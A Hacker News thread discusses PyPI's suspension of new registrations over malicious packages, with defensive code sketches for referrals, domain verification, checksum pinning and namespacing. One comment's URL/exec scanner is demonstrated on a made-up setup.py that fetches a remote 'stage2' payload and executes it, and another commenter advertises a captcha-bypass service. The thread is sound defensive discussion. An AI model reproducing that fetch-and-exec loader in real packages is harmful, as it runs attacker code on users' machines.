PyPI new user and new project registrations temporarily suspended

[+] throwaway892238|2 years ago|reply

Methods to deal with malicious actors in your system:

- Require toilsome identity verification. Things that are in short supply and are difficult to get and uniquely identify a person. Examples include a phone number, credit card, driver's license, mailed letter, etc.

- Require a referral, both for accounts and for new packages. Don't allow a signup unless the user has a referral code generated by another user with good karma. This isn't fool-proof, as a user that does get an account can then generate more accounts. But it makes it easier to revoke them en-masse, and forces users to be more scrupulous about who they refer, as you can block the referrer as well as the malicious user.

- Require community review, both of new users, and new packages. New users/packages are sent to a mailing list of moderators and somebody has to approve it, but someone who notices a problem can also reject it, even after it's been mistakenly approved. Slower, but there's more eyeballs to spot malicious stuff. This is more common among open source projects. (Growing your moderator list is important, as well as automating as much of the review process as possible; obviously PyPI currently has a shortage of moderators, but they should have a huge number of them by now!)

- Don't allow new users to do certain things until enough time has passed or they have accrued enough karma points. May require fixing bugs, answering questions, etc; work which benefits the community and most malicious actors wouldn't invest the time and effort in. Again not fool-proof, but definitely increases the time and difficulty for successful attacks.

- Captchas. These can obviously be worked around, but are a minimum-effort way to avoid bot signups.

For better defense-in-depth, combine multiple methods.
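A rough sketch of the referral bullet above, to show why revoking en masse gets easier once referrals are recorded. This is not anything PyPI implements; `ReferralGraph` and its method names are made up for illustration.

```python
from collections import defaultdict, deque


class ReferralGraph:
    """Hypothetical record of who referred whom, so a bad subtree can be revoked at once."""

    def __init__(self):
        self.children = defaultdict(list)  # referrer -> accounts they invited
        self.parent = {}                   # account -> referrer (None for seed accounts)
        self.revoked = set()

    def add_seed(self, user):
        """Register an account that needs no referral (e.g. an existing trusted user)."""
        self.parent[user] = None

    def refer(self, referrer, new_user):
        """Create `new_user` on the strength of `referrer`'s referral."""
        if referrer not in self.parent or referrer in self.revoked:
            raise ValueError(f"{referrer!r} cannot issue referrals")
        if new_user in self.parent:
            raise ValueError(f"{new_user!r} already exists")
        self.parent[new_user] = referrer
        self.children[referrer].append(new_user)

    def revoke_subtree(self, user):
        """Revoke `user` and every account reachable through their referrals."""
        queue = deque([user])
        newly_revoked = []
        while queue:
            current = queue.popleft()
            if current in self.revoked:
                continue
            self.revoked.add(current)
            newly_revoked.append(current)
            queue.extend(self.children[current])
        return newly_revoked


graph = ReferralGraph()
graph.add_seed("alice")
graph.refer("alice", "bob")
graph.refer("bob", "mallory")
graph.refer("mallory", "sock1")
graph.refer("mallory", "sock2")
graph.refer("alice", "carol")

print(graph.revoke_subtree("mallory"))  # ['mallory', 'sock1', 'sock2']
```

Calling `revoke_subtree("bob")` instead would also take out the referrer, which is the "block the referrer as well" option.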

[+] reaperman|2 years ago|reply

> Captchas. These can obviously be worked around...

Best to not consider this a barrier at all. I helped build a lot of systems to bypass these and the "guarantees" they offer are truly "de minimis". Phone numbers and credit cards are only slightly better.

The real answer is to determine how much value a successful compromise of your service can generate, and combine enough barriers to clearly exceed that value. Some criminals are very business-savvy, but many have poor judgement of value and will overspend on marginal cost-of-acquisition and try to "make up for it in volume", so it's important to be obviously not worth the expense.

Unfortunately for PyPI, there's a wide gamut of value gained from compromise from a wide variety of different actors. And for some of those actors, the potential value gained is existential, so they are willing to spend anything to compromise PyPI, and they have incredible resources. So then PyPI has to make itself more expensive than compromising Windows/SS7/Linux/iOS/Office365/AT&T/etc/etc. And that's a very difficult field to find yourself competing in.

Shameless plug: http://resolved.dominuslabs.com feel free to reach out for custom work - specializing in accessing gated sites for new search engines to do better web crawling, scraping public data, etc.

[+] pimlottc|2 years ago|reply

Of course, it should also be noted that these will create burdens for legitimate users as well, in some cases disproportionately (e.g. new developers will have a harder time getting referrals).

[+] woodruffw|2 years ago|reply

I posted a variant of this comment below, but for here as well: the single greatest challenge with any additional method here is operational burden. New methods for ensuring the authenticity of users cannot substantially increase the load on PyPI's maintainers without compromising the other activities that keep PyPI well-maintained (like developing and reviewing features, administrating the running instance itself, and addressing baseline operational overhead from locked-out users, etc.).

A pernicious thing about this problem is that even the methods that appear to devolve time away from the maintainers (like community review) quietly increase operational burden: they require effort to be allocated to support for those systems, require maintenance and administration of the "trusted list," etc.

[+] ryan29|2 years ago|reply

I think domain verified namespaces would make a difference. If I own example.com, it makes sense for my namespace to be @example.com (pypi.org/@example.com/project).

If all namespaces were domain based it would reduce impersonation and confusion while making it much easier to assess trustworthiness. If I can definitively associate a namespace across GitHub, PyPI, the internet, I can get a much better idea of whether or not I should trust someone.

I also think that could evolve into some type of attestations about money already being spent. I call it collateral attestation.

For example, if I use GitHub Sponsors to donate to a project, GitHub could attest to that. If I donate $50 to the PyPI project, they get an attestation that someone donated $50 to them and I get an attestation that I donated $50 to someone.

Even if it's only domain validated namespaces, at least that's something that costs a little bit of money every year and it scales without a lot of human intervention compared to most other ideas.
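One way domain validation could work in principle, sketched under assumptions: the registry derives a token per account and domain, the owner publishes it in a DNS TXT record, and the registry checks for it. The `namespace-verify=` record format, the function names, and the injected `lookup_txt` resolver are all hypothetical; the standard library has no TXT lookup, so the example uses a fake one.

```python
import hashlib
import hmac


def challenge_token(secret: bytes, account: str, domain: str) -> str:
    """Derive a per-account, per-domain token that the domain owner must publish."""
    message = f"{account}\n{domain.lower()}".encode()
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def owns_domain(secret: bytes, account: str, domain: str, lookup_txt) -> bool:
    """Return True if the expected token appears among the domain's TXT records.

    `lookup_txt` is a caller-supplied function (domain -> list of strings).
    A real deployment would plug a DNS resolver in here.
    """
    expected = "namespace-verify=" + challenge_token(secret, account, domain)
    return any(
        hmac.compare_digest(expected.encode(), record.encode())
        for record in lookup_txt(domain)
    )


# Fake DNS data standing in for a real resolver.
secret = b"registry-side secret (hypothetical)"
token = challenge_token(secret, "ryan", "example.com")
fake_dns = {"example.com": ["v=spf1 -all", "namespace-verify=" + token]}


def fake_lookup(domain):
    return fake_dns.get(domain, [])


print(owns_domain(secret, "ryan", "example.com", fake_lookup))     # True
print(owns_domain(secret, "mallory", "example.com", fake_lookup))  # False
```

Binding the token to the account means another user cannot reuse a record that someone else published.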

[+] bscphil|2 years ago|reply

> For better defense-in-depth, combine multiple methods.

It really starts to sound like we are reinventing Linux distributions. A strong vetting process and barriers to entry are why Linux distributions remain free of malware in their repositories. AFAIK no Linux distribution has ever been found distributing malware in an official repository (though I'd be interested if anyone knows of an exception).

[+] Hnrobert42|2 years ago|reply

These are good suggestions. I also like @BozeWolf’s suggestion below about charging for new accounts.

You could even do a combo. Like $25 sign up. Free with referral.

[+] strogonoff|2 years ago|reply

Identity verification is the only reliable option for popular public package registries that want to avoid becoming a cesspool of malware.

The problem with identity verification is that it can be expensive for you, the registry (reliable implementations require things up to video call verification in case of doubt), and risky for your users (who will have to trust your or your verification partner’s infosec practices with their PII).

Ideally either of those, but if you screw up—both.

It’s also crucial to remember that identity verification is never a guarantee: you cannot dispense with any pre-existing measures, like manual package review and user reports, to recoup the costs.

All in all, it is inevitably an expensive undertaking and a sad example of the tragedy of the commons.

[+] quickthrower2|2 years ago|reply

Or don’t have a system? What if you installed stuff via a git (not necessarily github) url/tag? Puts the onus on users to verify. Use checksums to avoid upstream changes you didn’t explicitly accept. No different than cloning a repo from a risk perspective (just as risky but no more so). This removes any implicit seal of approval. Companies like malwarebytes could monitor and maintain blacklists or whitelists. Sign up to multiple lists if paranoid.
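A minimal sketch of the checksum part, assuming you recorded a SHA-256 for the exact archive you reviewed; the function names are illustrative. pip's hash-checking mode (`--require-hashes`, with `--hash=sha256:...` entries in a requirements file) is built on the same idea for downloaded archives.

```python
import hashlib
import hmac


def sha256_of(data: bytes) -> str:
    """Hex SHA-256 digest of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_pinned(data: bytes, pinned_sha256: str) -> None:
    """Raise ValueError unless `data` matches the digest that was pinned earlier."""
    actual = sha256_of(data)
    if not hmac.compare_digest(actual, pinned_sha256.lower()):
        raise ValueError(f"checksum mismatch: expected {pinned_sha256}, got {actual}")


reviewed = b"contents of the archive you actually reviewed"
pin = sha256_of(reviewed)          # stored alongside the dependency declaration

verify_pinned(reviewed, pin)       # passes silently

try:
    verify_pinned(reviewed + b" plus an upstream change", pin)
except ValueError:
    print("rejected: upstream changed since the pin was recorded")
```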

[+] nonethewiser|2 years ago|reply

What about some testnet that allows people to push things up as a test? That seems like a valid need but a source of lots of garbage at the same time.

[+] nmstoker|2 years ago|reply

What about some method of "moderate to get upload credit"?

Obviously not full moderation (as you don't trust these people) but you could have them fed a few basic tasks that support moderation.

They would be given a selection of tasks, some of which overlap with tasks done by trusted people. If the user answers consistently with the trusted person, they get some credit. When a few such users show consensus on the non-overlapping tasks, those answers get accepted.
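Roughly what that could look like, as a sketch only. The thresholds (`min_rate`, `quorum`), the "no reliable user disagreed" rule, and the data shapes are assumptions picked for illustration.

```python
from collections import Counter


def agreement_rate(user_answers, trusted_answers):
    """Fraction of overlapping tasks where the user matched the trusted answer."""
    overlap = [task for task in user_answers if task in trusted_answers]
    if not overlap:
        return 0.0
    hits = sum(user_answers[task] == trusted_answers[task] for task in overlap)
    return hits / len(overlap)


def accepted_answers(all_answers, trusted_answers, min_rate=0.8, quorum=3):
    """Accept answers on non-overlapping tasks once enough reliable users agree.

    all_answers: {user: {task_id: answer}}
    Returns {task_id: answer} for tasks where at least `quorum` reliable users
    gave the same answer and no reliable user disagreed.
    """
    reliable = [
        user for user, answers in all_answers.items()
        if agreement_rate(answers, trusted_answers) >= min_rate
    ]
    votes = {}
    for user in reliable:
        for task, answer in all_answers[user].items():
            if task not in trusted_answers:
                votes.setdefault(task, Counter())[answer] += 1
    accepted = {}
    for task, counter in votes.items():
        if len(counter) == 1:                      # unanimous among reliable users
            answer, count = next(iter(counter.items()))
            if count >= quorum:
                accepted[task] = answer
    return accepted


trusted = {"t1": "spam", "t2": "ok"}               # tasks also done by moderators
answers = {
    "u1": {"t1": "spam", "t2": "ok", "t3": "spam"},
    "u2": {"t1": "spam", "t2": "ok", "t3": "spam"},
    "u3": {"t1": "spam", "t2": "ok", "t3": "spam", "t4": "ok"},
    "u4": {"t1": "ok", "t2": "spam", "t3": "ok"},  # disagrees with moderators
}
print(accepted_answers(answers, trusted))          # {'t3': 'spam'}
```

Here `u4` earns no credit, so their vote on `t3` is ignored, and `t4` stays pending because only one reliable user has answered it.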

[+] matheusmoreira|2 years ago|reply

Linux distribution maintainers already do all of those things and probably more. It's always interesting to see other projects rediscover these lessons multiple times.

[+] BozeWolf|2 years ago|reply

I wonder if Apple’s trick would work for python packages. Pay a few (5? 10? 20?) bucks to become a Pypi developer/sponsor, it would also pay pypi’s operational bills. It raises the bar for malicious actors.

Additionally, if pypi provides keys to developers, pypi can also revoke certificates for developers making malicious packages.

It would need a system which checks package signatures on startup of a python app, or maybe there is some other way to do that. `pip --check` or something which then runs in pipelines, specifically meant to check for malicious packages each day.

To decrease the barrier of entry on pypi, students could identify with their student number. Or pypi could work with a system where you have trusted users and packages and untrusted users. A bit like the blue checkmark, but without the negative connotation.

[+] viraptor|2 years ago|reply

That seems like a way to kill pypi as a popular service. For the 3 or so packages I have, I'd probably just change the description to pull from another location rather than pypi. It's not that I can't afford it, it's just that I don't want to end up paying for another subscription if rules change.

There are also people who wouldn't be able to pay for legal reasons. It would also stop teenagers who don't need the hassle of getting parents to pay.

[+] woodruffw|2 years ago|reply

FD: I’ve done some work on PyPI, but I am not an admin and everything below is an independent opinion/understanding.

PyPI’s operational costs are, to my understanding, mostly covered: hosting is graciously provided by a sponsor, and the PSF currently funds roles for its development, administration, and security. More funding is always good and I believe the PyPI admins are looking to enable payments through the newly released “Organizations” feature[1].

Edit: and to make it more clear: payments for Organizations would be principally aimed at corporations and other groups.

> Additionally, if pypi provides keys to developers, pypi can also revoke certificates for developers making malicious packages.

There are currently plans in progress to allow PyPI users to upload Sigstore[2] signatures for packages.

That won’t directly address the spam issue, however — signatures will be opt-in (by necessity, due to the size of the packaging ecosystem), and no codesigning scheme can prevent a spammer from simply assuming a new identity (especially when new identities are “free,” as they normally are.)

Separately, revocation itself is a nasty problem for packaging ecosystems to deal with: ecosystems with trillions of dollars of value behind them (like the Web PKI) struggle with it, so it’s not immediately clear that it would be anything other than an additional operational burden.

Similarly for reputational systems: they’re difficult to operationalize without additional maintainer burden. That’s not to say that they’re necessarily bad or impractical for PyPI’s purposes; only that I’m not aware of a successful use of them in an open source packaging ecosystem. Compare, for example, PGP’s WoT failures.

[1]: https://blog.pypi.org/posts/2023-04-23-introducing-pypi-orga...

[2]: https://www.sigstore.dev/

[+] pmeira|2 years ago|reply

I maintain a few niche (electric power systems) packages, and I wouldn't mind a one-time or yearly fee, or a fee per project created. I say this as a Brazilian who lived in the middle of nowhere and managed to have a website in the 90's as a teen. If a monetary fee is not desirable, some other hurdle/challenge would probably work fine.

Recently I've seen someone on Reddit trying to automate the creation of PyPI projects through GitHub Actions. The person was complaining that the first deployment couldn't use an API key for that project since it didn't exist. So I'm not surprised some people are trying to do the same for malicious purposes.

The PyPI front page lists 455k projects. If you search for "test", you'll see there's a lot of throwaway projects (note that test.pypi.org is a thing). I'm mostly an EE researcher and I'm not sure students need a low barrier to entry to PyPI, since pip and other tools support installing from GitHub without too much hassle and there are also other non-PyPI package indices. Student packages/projects tend to be abandoned soon after graduation. An archived repo (with a license...), on GitHub or somewhere else, sounds more reasonable and also has more visibility that could end in code reuse someday (through the service's own search and search engines in general). I'd love to understand why so many people repeat this meme that students and teens need trivial access to production infra like PyPI.

So, I'd say being too inclusive, allowing fully unrestricted trivial creation of projects is kinda foolish. There needs to be some extra step, be it a fee, identity confirmation, manual moderation/approval, or something else. I'm sure the PyPA devs/maintainers have ideas.

[+] miohtama|2 years ago|reply

You can always have a trusted community member waive the payment requirement, so anyone who demonstrates genuine effort can have it for free.

[+] CameronNemo|2 years ago|reply

Universities could host gitlab instances with pypi registries built-in.

[+] NegativeK|2 years ago|reply

Start asking maintainers for SBOMs (this is rhetorical; please don't) and you'll find out how disinterested they are in doing even more work for others. They understand that there's a problem, but don't have the will to deal with extra work when they're already short on time.

Open source projects tend to be maintained by a tiny number of people who are scratching their own itch, not signing up for more barriers.

[+] CommitSyn|2 years ago|reply

As long as devs could be identified properly (ID selfie + ID closeup + small payment with card in same name) and students do the same with a smaller amount, I think that could work. Refund of protection deposit when you close your account. System of honor based on account age. The problem is it's incredibly hard to properly ID people. If fraudsters can get an ID+card they can make a convincing fake selfie ID photo from social media pictures. Plus accounts can just be stolen.

[+] crabbone|2 years ago|reply

Hahaha no. You physically cannot do it. Read PEP-508. Python can install packages from anywhere. Even if you start with PyPI, the dependency can be specified as hosted on a random unrelated resource.
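For anyone who hasn't seen it, the PEP 508 form being referred to is `name @ url`. A deliberately simplified sketch of spotting such direct references in a dependency list; the package names and URLs are invented, and the parsing ignores extras and most of the grammar.

```python
from urllib.parse import urlparse


def direct_reference_host(requirement: str):
    """Return the host a 'name @ url' requirement points at, or None if it has no URL.

    Simplified on purpose: it splits on the first '@' and drops a trailing
    environment marker, rather than implementing the full PEP 508 grammar.
    """
    _name, separator, rest = requirement.partition("@")
    if not separator:
        return None
    url = rest.split(" ;", 1)[0].strip()
    return urlparse(url).hostname


dependencies = [
    "requests>=2.31",
    "mypkg @ https://example.com/mypkg-1.0.tar.gz",
    "tool @ git+https://git.example.org/team/tool.git@v2.0 ; python_version >= '3.8'",
]
for dependency in dependencies:
    print(dependency.split()[0], "->", direct_reference_host(dependency))
```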

And, on principle, I wouldn't pay PyPI anything. I want them gone, I don't want my money to feed a bunch of incompetent people who make my life miserable. So, if they were to implement this idea, I'd be hosting my packages on GitHub or Gitlab etc. and have dependencies link to those sources.

[+] efitz|2 years ago|reply

> The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave.

People suck and that is why we cannot have nice things.

[+] miohtama|2 years ago|reply

It’s called the Tragedy of the Commons

https://en.m.wikipedia.org/wiki/Tragedy_of_the_commons

One solution would be to have a minimum payment or a trusted sponsor in order to register a new package. A minimum trust score through well-known community persons, or reduce spam by payments.

On the root cause why people suck is that different cultures and different people have different values. For many people making money by spamming is not an issue in their own internal value system. Thus, it is better to be tackled by making spam unprofitable.

[+] Hnrobert42|2 years ago|reply

The shame of it is that a tiny, tiny, tiny fraction of people really suck. The number of people involved is probably less than a thousand. (This is my totally uninformed speculation.)

[+] donio|2 years ago|reply

Yes, people suck and I wish they didn't but the other side of the problem is that the centralized flat-namespace model of PyPI is especially vulnerable.

[+] imran-iq|2 years ago|reply

It's only a matter of time until it happens to other systems too. Take rust for example where folks can install software via `cargo install <global name package>`. Top that off with the fact that during compile (as an attacker) you have full access to your victim's computer[0].

Python just happens to have more popularity for now.

I think golang gets this right where you need the full package name to have it be usable with get/build/install commands.

---

0: https://doc.rust-lang.org/cargo/reference/build-scripts.html

[+] woodruffw|2 years ago|reply

Namespacing isn't the problem here: an ecosystem with two (or more) levels of namespacing has the exact same username and package stuffing issues. Namespacing arguably makes typosquatting more difficult, but that has nothing to do with build-time code execution (a common feature of packaging systems) or other package confusion techniques.

Go is able to avoid these problems because it (arguably wisely) sidesteps nearly all package index problems by punting them to the source host.

[+] crabbone|2 years ago|reply

The answer was there all along since at least Maven (but probably earlier). When specifying dependencies in Maven, you need to also provide checksums. Really hard to screw that up accidentally.

But, the real problem is that any such system needs moderators. Verifying submissions is a tedious and difficult task with a lot of responsibility, if we are talking about something the size of PyPI. If they want to properly process the volume of submissions they have today, they need an army...

On the other hand, 99% of all stuff stored on PyPI is absolute junk. Yet on the other hand, people are used to there being dozens of versions of every package and packages declare dependencies very liberally.

All leads to the situation where there's a "frontier" of packages that can be installed together, but anything that lags 3-4+ versions behind the frontier is just taking space. Even if it's not malicious, it's not installable anymore because there's no more support for the platform it was written for.

But this is not the end of it. There are tons of simply broken packages, where some part of the archive is missing, or is malformed etc.

Proper moderation would have you submit your code, then review it, then publish it. Possibly, rejecting it in between if the code doesn't match requirements. Most people who publish their stuff to PyPI don't understand what needs to be in the package. Even packages like NumPy are full of useless junk.

But this will never happen, because the "community" grew used to the circus PyPI is. Python community doesn't care about the quality of the code, safety or anything other than a very shortsighted "make it work now" kind of goal.

There won't be a revision that purges junk or makes adding more junk harder. There will be another "quick fix", that will be obviously bad, but will kick the can down the road for a while longer.

[+] kccqzy|2 years ago|reply

A massive amount of people signing up with malicious intent (the Sybil attack) is a thing afflicting every single online service with a signup. I don't blame PyPI, but I think it's genuinely a hard problem to solve. Big Tech often combats this by running a bunch of heuristics and suspending accounts they detect to be bad, but of course we know how easy it is for even tiny false positives to blow up. I think we might come to the end of the era of free online accounts; only those accounts requiring a method of payment will continue to be viable.

[+] lolinder|2 years ago|reply

Modern package registries implicitly treat all package authors as equally trustworthy—you don't need to know which organization wrote the `zip` package, you just need to know that there's a package by that name and it opens your zip files. It's charmingly egalitarian and quite convenient, but the global namespace both enables typosquatting and trains developers to not think at all about the people who write the stuff in their supply chain. The biggest point of failure in any system—the humans—has no first-class expression in the typical modern package registry.

I can't help but wonder if this is something Maven got right. Namespacing packages according to domain names makes typosquatting vastly more difficult to pull off and makes authorship of dependencies a first-class concern for end users. If something is under org.apache, that means something about the contents of the package, and PyPI and company don't front that information nearly as well as Maven does.

[+] dlor|2 years ago|reply

I know folks hate the centralization of identity management to the big identity providers, but as AI gets better and better at defeating captcha it's going to get harder and harder for the small, independent ones to operate reliably and securely.

[+] adhesive_wombat|2 years ago|reply

"Never use your real name on that internet thing" will soon be a quaint throwback.

[+] reaperman|2 years ago|reply

I wrote a lot of the systems to break captchas. Currently the "small" (really medium), independent ones are doing way way way better than the big identity providers. Google reCAPTCHA was particularly easy for us to get past.

Shameless plug: http://resolved.dominuslabs.com feel free to reach out for custom work - specializing in accessing gated sites for new search engines to do better web crawling, scraping public data, building better API integrations on top of existing services, etc.

[+] vhcr|2 years ago|reply

Open Source captcha libraries are non-viable: you can train a NN in a few hours with a simple CNN architecture, and there are some papers that describe how to do it.

[+] tzhenghao|2 years ago|reply

Tragedy of the commons - it only takes a few bad actors to ruin it all for us. Almost all distributors face this problem, from Docker Hub to PyPI. This also reminded me of the official Postgres Docker image running a cryptominer in the background [1]

[1] - https://github.com/docker-library/postgres/issues/770

[+] badrabbit|2 years ago|reply

I think this is the wrong problem they are addressing. They should allow malicious users to be a possibility but what is lacking is package authentication/signing.

Sign all packages. New users get the worst grade, users with a lot of downloads over a long period get a slightly better grade, and then there are different levels of trusted third-party reviewed grades.

For new users' packages you get a big red warning that needs to be confirmed and bypassed in multiple ways with a message like "ERROR:THIS PACKAGE IS FROM AN ILL-REPUTED SOURCE, IT IS LIKELY MALICIOUS AND HASN'T UNDERGONE HUMAN REVIEW" kind of scream at you a little.

[+] omginternets|2 years ago|reply

I’ve seen multiple comments stating that namespacing solves (or at least mitigates) these kinds of attacks. Could someone kindly explain how? I’m sure it’s straightforward, but I don’t see it.

[+] woodruffw|2 years ago|reply

It doesn't, at least not directly. Namespaces make typosquatting more difficult, but they don't stop the other main incentives for spamming an index with inauthentic users and packages, i.e.:

1. Sneaking an inauthentic dependency into a tree somewhere;

2. Convincing less experienced users to install your package directly.

My understanding is that (2), in particular, is an increasing issue in cryptocurrency and other communities: inexperienced users typically talk on Discord and other chats, and may not fully understand that `pip install foo` essentially means "allow a random person to run code on my machine."

[+] bpicolo|2 years ago|reply

It's a lot easier to typo a package (e.g. requests -> request results in the wrong package) than it is to typo a namespace-package (@namespace/requests -> @namespace/request would result in an error).

Somewhat likewise, namespaces can build trust in a way that single packages can't
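A toy model of the difference, just to make the point concrete. The index layout, account names, and `NamespacedIndex` API are invented; the only assumption that matters is that a namespace can be published to only by its owner.

```python
class NamespacedIndex:
    """Toy registry where only a namespace's owner may publish into it."""

    def __init__(self):
        self.owners = {}    # namespace -> owning account
        self.packages = {}  # (namespace, name) -> publishing account

    def claim(self, namespace, account):
        if namespace in self.owners:
            raise PermissionError(f"namespace {namespace!r} is already claimed")
        self.owners[namespace] = account

    def publish(self, account, namespace, name):
        if self.owners.get(namespace) != account:
            raise PermissionError(f"{account!r} does not own {namespace!r}")
        self.packages[(namespace, name)] = account

    def resolve(self, spec):
        namespace, _, name = spec.lstrip("@").partition("/")
        if (namespace, name) not in self.packages:
            raise LookupError(f"no package {name!r} in namespace {namespace!r}")
        return self.packages[(namespace, name)]


# Flat namespace: anyone can register the typo, and it resolves silently.
flat_index = {"requests": "maintainers", "request": "squatter"}
print(flat_index["request"])              # squatter

# Namespaced: the squatter cannot publish the typo inside someone else's namespace.
index = NamespacedIndex()
index.claim("namespace", "maintainers")
index.publish("maintainers", "namespace", "requests")
try:
    index.publish("squatter", "namespace", "request")
except PermissionError as error:
    print("publish refused:", error)
try:
    index.resolve("@namespace/request")
except LookupError as error:
    print("install fails:", error)
```

A typo in the namespace itself (`@namspace/requests`) is still squattable in this model, so this narrows the attack rather than removing it.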

[+] elashri|2 years ago|reply

I like the simple solution that arXiv uses (which allows anyone to publish a pre-print); it also has an order of magnitude more code (compared to PyPI packages). If you want to be able to publish for the first time, you have to get a referral from a well established author on the platform.

And of course, things might be easier because you need to register using your real identity and that is expected. This is different for PyPI, which until now has not expected people to have their real identities linked to their accounts.

[+] benatkin|2 years ago|reply

I hope they get a handle on this and don't do anything else to alienate data portability folks like making Microsoft the only "Trusted Publisher".

https://news.ycombinator.com/item?id=35646436

[+] ewdurbin|2 years ago|reply

there are no plans to limit trusted publishers. in fact there is another in the works: https://github.com/pypi/warehouse/issues/13551

[+] Severian|2 years ago|reply

I've been very cautious the last couple of years due to these bad actors when looking at packages that might suit my needs. If there is no online presence of the source code (git anything, zips/gzs, etc), multiple packages submitted in a short time frame, or a greater than normal amount, and/or a derivation/plugin of a popular package it's usually a no-go.

For those that I do possibly trust, I then download the package (pip download) and review it. Doing a quick regex for URLs or exec() calls helps, but I probably should use something like guarddog (https://github.com/DataDog/guarddog)
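The quick regex pass could look something like this. It is only a sketch: the patterns are my guess at a reasonable starting point, `eval` is added alongside `exec` as an assumption, and a check like this is trivially evaded by obfuscation, so it flags things for a human to read rather than proving anything.

```python
import re

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
DYNAMIC_EXEC_RE = re.compile(r"\b(?:exec|eval)\s*\(")


def suspicious_lines(source: str):
    """Yield (line_number, reason, line) for lines containing URLs or exec()/eval() calls."""
    for number, line in enumerate(source.splitlines(), start=1):
        if URL_RE.search(line):
            yield number, "url", line.strip()
        if DYNAMIC_EXEC_RE.search(line):
            yield number, "dynamic-exec", line.strip()


# Made-up example of the kind of setup.py content worth a closer look.
sample = '''import base64, urllib.request
payload = urllib.request.urlopen("http://example.invalid/stage2").read()
exec(base64.b64decode(payload))
print("hello")
'''

for number, reason, line in suspicious_lines(sample):
    print(f"{number}: [{reason}] {line}")
```

In practice you would run this over every `.py` file in the unpacked archive from `pip download`.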

[+] NoboruWataya|2 years ago|reply

I know `pip search` has been disabled with PyPI for a while now due to a constant deluge of requests overwhelming the backend. Knowing that, and seeing this update, makes me think that PyPI is subject to an exceptional volume of malicious activity.

Does anyone know if it's true that PyPI receives more abuse than similar projects and, if so, why?

[+] zyl1n|2 years ago|reply

As someone who straddles both the Python and Java worlds, I don't seem to hear about this kind of malicious package problem with Maven (Central) as much as I do with PyPI. What could be the difference? Perhaps the Java world is full of old farts like me doing mundane things with a handful of well-established libraries.

[+] blibble|2 years ago|reply

namespacing? what's that

[+] adontz|2 years ago|reply

PyPI could integrate with Google/Microsoft/Apple as an authentication system (OAuth?).

Almost everyone has one of these IDs and it's hard enough to register new ones.

[+] woodruffw|2 years ago|reply

> PyPI could integrate with Google/Microsoft/Apple as an authentication system (OAuth?).

PyPI supports "trusted publishing,"[1] which provides a variant of this: it doesn't replace a user identity, but instead allows a platform (currently just GitHub, but support for others is on the way) to mint API tokens on a project's behalf.

Binding PyPI identities to well-known IdPs would address some of the problems here, but also introduces new ones: it creates a new kind of account lockout state (users who lose access to their IdP service, for whatever reason), introduces regulatory and data collection concerns, may prove excessively restrictive to users in countries with filtered Internet access, etc.

[1]: https://blog.pypi.org/posts/2023-04-20-introducing-trusted-p...

[+] vhcr|2 years ago|reply

All the spam I receive directly from gmail.com accounts kind of disproves your point.

[+] jjgreen|2 years ago|reply

That's what Rust does, you can only register with crates.io with a GitHub account.
